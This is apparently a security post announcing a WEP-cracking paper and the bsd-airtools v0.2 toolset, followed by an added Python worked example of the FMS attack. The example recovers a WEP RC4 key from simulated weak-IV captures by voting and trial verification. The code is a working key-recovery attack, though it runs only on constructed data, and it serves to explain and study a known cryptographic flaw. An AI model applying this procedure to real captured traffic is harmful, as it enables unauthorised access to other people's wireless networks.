Practical Exploitation of RC4 Weaknesses in WEP Environments

This document will give a brief background on 802.11b-based WEP weaknesses, outline a few additional flaws in RC4 that stem from the concepts outlined in "Weaknesses in the Key Scheduling Algorithm of RC4" (FMS) and "Using the Fluhrer, Mantin, and Shamir Attack to Break WEP" (SIR), and describe specific methods that will allow you to optimize key recovery. This document is provided as a conceptual supplement to dweputils, a WEP auditing toolset which is part of the bsd-airtools package provided by Dachb0den Labs. The basic goal of the article is to provide technical details on how to effectively implement the FMS attack so that it works efficiently with both a small amount of IV collection time as well as cracking and processing time, and to provide details on how other pseudo-random generation algorithm (PRGA) output bytes reveal key information.

http://www.dachb0den.com/projects/bsd-airtools/wepexp.txt

I'd also like to announce that I've just released bsd-airtools v0.2, which implements this outlined form of attack and allows you to crack weak keys with considerably fewer collected packets than any WEP cracking applications that are currently available.

http://www.dachb0den.com/projects/bsd-airtools.html

Cheers,
-h1kari
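The key-recovery procedure the announcement refers to, as an added worked example that is not from the original post and is not code from bsd-airtools or dweputils. It simulates the FMS attack on WEP's RC4 key scheduling: a 40-bit secret key, "weak" IVs of the form (A+3, 255, X) for each secret byte position A, and the WEP property that every data frame starts with the 0xAA LLC/SNAP byte, so the first keystream byte of each frame is known. Packet capture is simulated by encrypting under the true key (constructed data; nothing here touches a radio). The top-3 candidate search with trial verification at the end is this example's own design choice, not a description of how dweputils works.

```python
"""FMS attack on WEP-style RC4 keys: added illustration, not bsd-airtools code."""
import random
from collections import Counter

N = 256
SNAP_FIRST_BYTE = 0xAA  # first plaintext byte of every 802.11 data frame (LLC/SNAP header)


def rc4_first_byte(key):
    """Full RC4 KSA over `key` (IV || secret in WEP), then the first PRGA output byte."""
    S = list(range(N))
    j = 0
    for i in range(N):
        j = (j + S[i] + key[i % len(key)]) % N
        S[i], S[j] = S[j], S[i]
    i, j = 1, S[1]                      # PRGA step 1: i=1, j=0+S[1]
    S[i], S[j] = S[j], S[i]
    return S[(S[i] + S[j]) % N]


def fms_guess(iv, known_secret, z1):
    """FMS guess for secret byte A = len(known_secret) from one IV and first keystream byte z1.

    Runs the first A+3 KSA steps (all key bytes used there are known), checks the
    FMS 'resolved' condition and returns None if the IV does not meet it.
    """
    A = len(known_secret)
    K = list(iv) + list(known_secret)   # WEP key = 3-byte IV || secret
    S = list(range(N))
    j = 0
    for i in range(A + 3):
        j = (j + S[i] + K[i]) % N
        S[i], S[j] = S[j], S[i]
    if S[1] >= A + 3 or (S[1] + S[S[1]]) % N != A + 3:
        return None
    # If S[1], S[S[1]] and S[A+3] survive the remaining KSA steps (about 5% of the
    # time), z1 equals the value swapped into S[A+3] at step A+3, i.e.
    # z1 = S[j + S[A+3] + K[A+3]], so K[A+3] = S^-1[z1] - j - S[A+3].
    return (S.index(z1) - j - S[A + 3]) % N


def simulate_capture(secret):
    """Constructed capture: one frame per weak IV (A+3, 255, X), mapped to its first ciphertext byte."""
    captured = {}
    for A in range(len(secret)):
        for X in range(N):
            iv = (A + 3, N - 1, X)
            captured[iv] = rc4_first_byte(list(iv) + list(secret)) ^ SNAP_FIRST_BYTE
    return captured


def vote_next_byte(captured, known_secret, top=3):
    """Tally FMS guesses for the next secret byte; return the `top` most-voted values."""
    A = len(known_secret)
    votes = Counter()
    for X in range(N):
        iv = (A + 3, N - 1, X)
        if iv not in captured:
            continue
        z1 = captured[iv] ^ SNAP_FIRST_BYTE   # known plaintext reveals keystream byte 1
        g = fms_guess(iv, known_secret, z1)
        if g is not None:
            votes[g] += 1
    return [b for b, _ in votes.most_common(top)]


def key_matches(candidate, captured, checks=8):
    """Trial check: does the candidate key reproduce the captured first bytes?"""
    for iv, c in list(captured.items())[:checks]:
        if rc4_first_byte(list(iv) + list(candidate)) ^ SNAP_FIRST_BYTE != c:
            return False
    return True


def recover_key(captured, key_len, top=3):
    """Depth-first search over the top-voted candidates per byte, verified at the leaves."""
    def search(prefix):
        if len(prefix) == key_len:
            return prefix if key_matches(prefix, captured) else None
        for b in vote_next_byte(captured, prefix, top):
            found = search(prefix + [b])
            if found is not None:
                return found
        return None
    return search([])


if __name__ == "__main__":
    secret = [random.Random(1).randrange(N) for _ in range(5)]   # constructed 40-bit key
    captured = simulate_capture(secret)
    print("true key :", bytes(secret).hex())
    print("recovered:", bytes(recover_key(captured, len(secret))).hex())
```

Two things worth noticing when running it: only a few percent of the resolved IVs actually vote for the right byte, so the recovery depends on the wrong guesses being spread thinly across the other 255 values, and each byte's vote is only meaningful once the preceding secret bytes are correct, which is why a wrong early candidate has to be caught by trial verification rather than by the vote counts alone.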